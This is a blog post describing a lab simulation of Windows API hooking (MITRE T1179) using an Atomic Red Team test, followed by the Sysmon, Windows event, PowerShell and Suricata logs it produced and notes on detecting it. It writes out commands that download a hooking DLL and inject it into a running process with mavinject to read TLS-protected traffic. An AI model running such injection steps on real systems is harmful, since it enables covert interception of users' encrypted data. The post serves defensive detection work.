detecting hooking in a windows environment

In this post we will be simulating and detecting Hooking (ID T1179) in the MITRE Framework. Per MITRE this tactic can be used for persistence, privilege escalation or Credential Access. We will be using one of Atomic Red Team’s available tests on Detection Lab.

Firstly, what is hooking?
“Code hooking is a very intrusive coding operation where mainly OS function calls are intercepted by a program to alter or augment their behavior.”- Securityintelligence.com

In simple terms, hooking is a technique where the attacker leverages a malicious file to intercept legitimate calls made to legitimate OS functions by the user. MITRE has a very well documented page on Hooking. Analyzing and Detecting hooking is difficult if we do not have an Endpoint Solution in place as this technique involves system level calls.

In our lab, we will be ‘hooking’ a simple GET request to a website and read what the website returns.First the image below shows what a normal user who is not infected sees when they make a GET request to https://example.com 

Observe how we do not see the payload. This is the expected behavior as we are visiting the website over HTTPS. Due to TLS encryption, payload is encrypted.

Let’s began our attack, first, we download the file to our machine. This file is a .dll file crafted by Red Canary which when executed, intercepts TLS Encryption and Enables the attacker to read the payload.

Step 1: Download the File. I have used my own directory but feel free to change it.
Invoke-WebRequest “https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1179/bin/T1179x64.dll” -OutFile “C:\Tools\Hooking\T1179x64.dll”

Step 2: Execute the File using mavinject.

PS C:\Users\vagrant> mavinject $pid /INJECTRUNNING C:\Tools\Hooking\T1179x64.dll
PS C:\Users\vagrant> Ready To Roll Out!

Step 3: Curl to a website.
curl https://example.com

Done. Now observe the Image below and compare it with the first image we saw. We see the payload as well

This is a very simple demonstration. In a real life scenario, the bad adversary will probably intercept using stealthier techniques. However, the underlying calls made remain the same. Now, let us see what got logged in Sysmon, Windows Security Events, Suricata and Zeek.

*Note: These Sysmon rules are pre-written by author SwiftOnSecurity. We might need to write these rules ourselves or implement their Sysmon Configuration.*
*we are using Mavinject.exe and hence this rule triggered. The bad adversary can use a different technique to hook and this rule might not trigger. Basically, this rule is not tied to hooking by itself.*

Rule 1: Mavinject:

04/07/2020 02:22:20 AM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=1 EventType=4 Type=Information ComputerName=win10.windomain.local User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=Process Create (rule: ProcessCreate) OpCode=Info RecordNumber=97717 Keywords=None Message=Process Create: RuleName: Mavinject UtcTime: 2020-04-07 02:22:20.284 ProcessGuid: {f26a5612-e3dc-5e8b-0000-0010d4429000} ProcessId: 5128 Image: C:\Windows\System32\mavinject.exe FileVersion: 10.0.18362.1 (WinBuild.160101.0800) Description: Microsoft Application Virtualization Injector Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: mavinject64.exe CommandLine: “C:\Windows\system32\mavinject.exe” 2968 /INJECTRUNNING C:\Tools\Hooking\T1179x64.dll CurrentDirectory: C:\Users\vagrant\ User: WIN10\vagrant LogonGuid: {f26a5612-cae7-5e8b-0000-0020ac8c0200} LogonId: 0x28CAC TerminalSessionId: 1 IntegrityLevel: High Hashes: SHA1=1847CE5831ACAECF84DD3E28A0EE6BF6FB98E343,MD5=80EAEBA49FFD53712F4304A442C95F0D,SHA256=926B54D54DEC971022BD18F97AB970D4533B34A1CEF9C65DCA1B696C1119CD90,IMPHASH=425D26BBB68ABA4D2076E192A519914A ParentProcessGuid: {f26a5612-ce7a-5e8b-0000-0010de0f2700} ParentProcessId: 2968 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe”

For windows security log we see,

1- Event 4103. This event gets logged when we enable PowerShell module logging.

04/07/2020 12:50:44 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4103 EventType=4 Type=Information ComputerName=win10.windomain.local User=NOT_TRANSLATED Sid=S-1-5-21-2442856559-1527439232-1060400613-1000 SidType=0 TaskCategory=Executing Pipeline OpCode=To be used when operation is just executing a method RecordNumber=46426 Keywords=None Message=CommandInvocation(Test-Path): “Test-Path” ParameterBinding(Test-Path): name=”Path”; value=”C:\Tools\Hooking\T1179x64.dll” Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.1 Host ID = 1a15f5ac-dd89-4529-a29f-b6a0e3d0d37a Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Engine Version = 5.1.18362.1 Runspace ID = 70c41cad-3d9a-4e5d-905c-3fed4b13e63a Pipeline ID = 8 Command Name = Test-Path Command Type = Cmdlet Script Name = Command Path = Sequence Number = 26 User = WIN10\vagrant Connected User = Shell ID = Microsoft.PowerShell

2-Event 4688 A new process has been created.

04/07/2020 02:23:16 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win10.windomain.local TaskCategory=Process Creation OpCode=Info RecordNumber=448997 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-2442856559-1527439232-1060400613-1000 Account Name: vagrant Account Domain: WIN10 Logon ID: 0x28CAC Target Subject: Security ID: S-1-0-0 Account Name: – Account Domain: – Logon ID: 0x0 Process Information: New Process ID: 0x1798 New Process Name: C:\Windows\System32\mavinject.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xb98 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: “C:\Windows\system32\mavinject.exe” 2968 /INJECTRUNNING C:\Tools\Hooking\T1179x64.dll Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.

3- Event 800 – Pipeline Execution Details

04/07/2020 12:46:38 AM LogName=Windows PowerShell SourceName=PowerShell EventCode=800 EventType=4 Type=Information ComputerName=win10.windomain.local TaskCategory=Pipeline Execution Details OpCode=Info RecordNumber=43826 Keywords=Classic Message=Pipeline execution details for command line: Invoke-WebRequest “https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1179/bin/T1179x64.dll” -OutFile “C:\Tools\Hooking\T1179x64.dll”. Context Information: DetailSequence=1 DetailTotal=1 SequenceNumber=128 UserId=WIN10\vagrant HostName=ConsoleHost HostVersion=5.1.18362.1 HostId=e539a787-786a-434a-bc04-540e65e5dbeb HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EngineVersion=5.1.18362.1 RunspaceId=837ff37b-1fdc-470d-b3a8-f8591ee0f2a3 PipelineId=23 ScriptName= CommandLine=Invoke-WebRequest “https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1179/bin/T1179x64.dll” -OutFile “C:\Tools\Hooking\T1179x64.dll” Details: CommandInvocation(Invoke-WebRequest): “Invoke-WebRequest” ParameterBinding(Invoke-WebRequest): name=”OutFile”; value=”C:\Tools\Hooking\T1179x64.dll” ParameterBinding(Invoke-WebRequest): name=”Uri”; value=https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1179/bin/T1179x64.dll

4- Suricata Signature: ET POLICY PowerShell Command With Encoded Argument Over SMB – Likely Lateral Movement

{“timestamp”:”2020-04-07T00:56:46.925599+0000″,”flow_id”:563498900682229,”in_iface”:”eth1″,”event_type”:”alert”,”src_ip”:”192.168.38.104″,”src_port”:50748,”dest_ip”:”192.168.38.103″,”dest_port”:445,”proto”:”TCP”,”alert”:{“action”:”allowed”,”gid”:1,”signature_id”:2027172,”rev”:1,”signature”:”ET POLICY Powershell Command With Encoded Argument Over SMB – Likely Lateral Movement”,”category”:”Potentially Bad Traffic”,”severity”:2,”metadata”:{“updated_at”:[“2019_04_10″],”created_at”:[“2019_04_10″],”signature_severity”:[“Minor”],”deployment”:[“Internal”],”attack_target”:[“Client_Endpoint”],”affected_product”:[“Windows_XP_Vista_7_8_10_Server_32_64_Bit”],”former_category”:[“POLICY”]}},”app_proto”:”smb”,”flow”:{“pkts_toserver”:25,”pkts_toclient”:16,”bytes_toserver”:15073,”bytes_toclient”:3369,”start”:”2020-04-07T00:56:46.620021+0000″},”payload r\nWindows

PowerShell transcript start\r\nStart time: 20200407005107\r\nUsername: WIN10\\vagrant\r\nRunAs User: WIN10\\vagrant\r\nConfiguration Name: \r\nMachine: WIN10 (Microsoft Windows NT 10.0.18362.0)\r\nHost Application: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nProcess ID: 2968\r\nPSVersion: 5.1.18362.1\r\nPSEdition: Desktop\r\nPSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.18362.1\r\nBuildVersion: 10.0.18362.1\r\nCLRVersion: 4.0.30319.42000\r\nWSManStackVersion: 3.0\r\nPSRemotingProtocolVersion: 2.3\r\nSerializationVersion: 1.1.0.1\r\n**********************\r\n**********************\r\nCommand start time: 20200407005212\r\n**********************\r\nPS C:\\Users\\vagrant> mavinject $pid \/INJECTRUNNING C\\Tools\\Hooking\\T1179x64.dll\r\n**********************\r\nCommand start time: 20200407005234\r\n**********************\r\nPS

I forgot to add this i the beginning but,

Sysmon Event Code 1 – Process Create
04/07/2020 02:23:16 AM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=1 EventType=4 Type=Information ComputerName=win10.windomain.local User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=Process Create (rule: ProcessCreate) OpCode=Info RecordNumber=97760 Keywords=None Message=Process Create: RuleName: Mavinject UtcTime: 2020-04-07 02:23:16.001 ProcessGuid: {f26a5612-e414-5e8b-0000-00109cf29000} ProcessId: 6040 Image: C:\Windows\System32\mavinject.exe FileVersion: 10.0.18362.1 (WinBuild.160101.0800) Description: Microsoft Application Virtualization Injector Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: mavinject64.exe CommandLine:C:\Windows\system32\mavinject.exe2968 /INJECTRUNNING C:\Tools\Hooking\T1179x64.dll CurrentDirectory: C:\Users\vagrant\ User: WIN10\vagrant LogonGuid: {f26a5612-cae7-5e8b-0000-0020ac8c0200} LogonId: 0x28CAC TerminalSessionId: 1 IntegrityLevel: High Hashes: SHA1=1847CE5831ACAECF84DD3E28A0EE6BF6FB98E343,MD5=80EAEBA49FFD53712F4304A442C95F0D,SHA256=926B54D54DEC971022BD18F97AB970D4533B34A1CEF9C65DCA1B696C1119CD90,IMPHASH=425D26BBB68ABA4D2076E192A519914A ParentProcessGuid: {f26a5612-ce7a-5e8b-0000-0010de0f2700} ParentProcessId: 2968 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe”

Conclusion:
Logging and Locating .dll files is a cumbersome task as .dlls are accessed almost every second. I could not locate the execution of the .dll as a log itself. However, we were able to locate the steps taken to execute this attack. While researching about how to detect hooking, Promon was one of the possible solutions. The Process Monitor tool can be used to help identify DLL load operations that might be vulnerable. The Process Monitor tool can be downloaded from https://technet.microsoft.com/sysinternals/bb896645.aspx. [Citation Microsoft]

Mention in the comments below if you know how to accurately detect dll calls made by the hooking technique.

 

Credits While making this lab:
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1179/T1179.md
https://attack.mitre.org/techniques/T1179
https://www.myeventlog.com/search/show/977
https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e
https://betanews.com/2015/11/18/how-to-monitor-registry-changes/
https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-security

Leave a Comment

Your email address will not be published. Required fields are marked *